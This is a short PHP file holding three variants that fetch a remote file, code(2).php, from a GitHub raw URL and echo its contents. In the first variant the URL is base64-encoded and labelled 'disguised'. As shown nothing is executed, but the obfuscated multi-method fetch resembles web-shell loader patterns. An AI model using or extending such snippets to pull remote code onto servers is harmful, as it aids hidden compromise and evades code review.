<?php
// URL yang disamarkan
$url = base64_decode('aHR0cHM6Ly9naXRodWIuY29tL3ViZWQzNTQzMTEvdGVzL3Jhdy9tYXN0ZXIvY29kZSgyKS5waHA=');

// Mendapatkan konten file
$options = [
    "http" => [
        "header" => "User-Agent: Mozilla/5.0\r\n"
    ]
];
$context = stream_context_create($options);
$content = file_get_contents($url, false, $context);

// Menampilkan konten
echo $content;
?>


<?php
$url = 'https://github.com/ubed354311/tes/raw/master/code(2).php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);

echo $result;
?>



<?php
$host = "raw.githubusercontent.com";
$port = 443;
$path = "/ubed354311/tes/raw/master/code(2).php";

$fp = stream_socket_client("ssl://$host:$port", $errno, $errstr, 30);
if (!$fp) {
    echo "ERROR: $errstr ($errno)";
} else {
    $out = "GET $path HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);

    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    fclose($fp);
}
?>
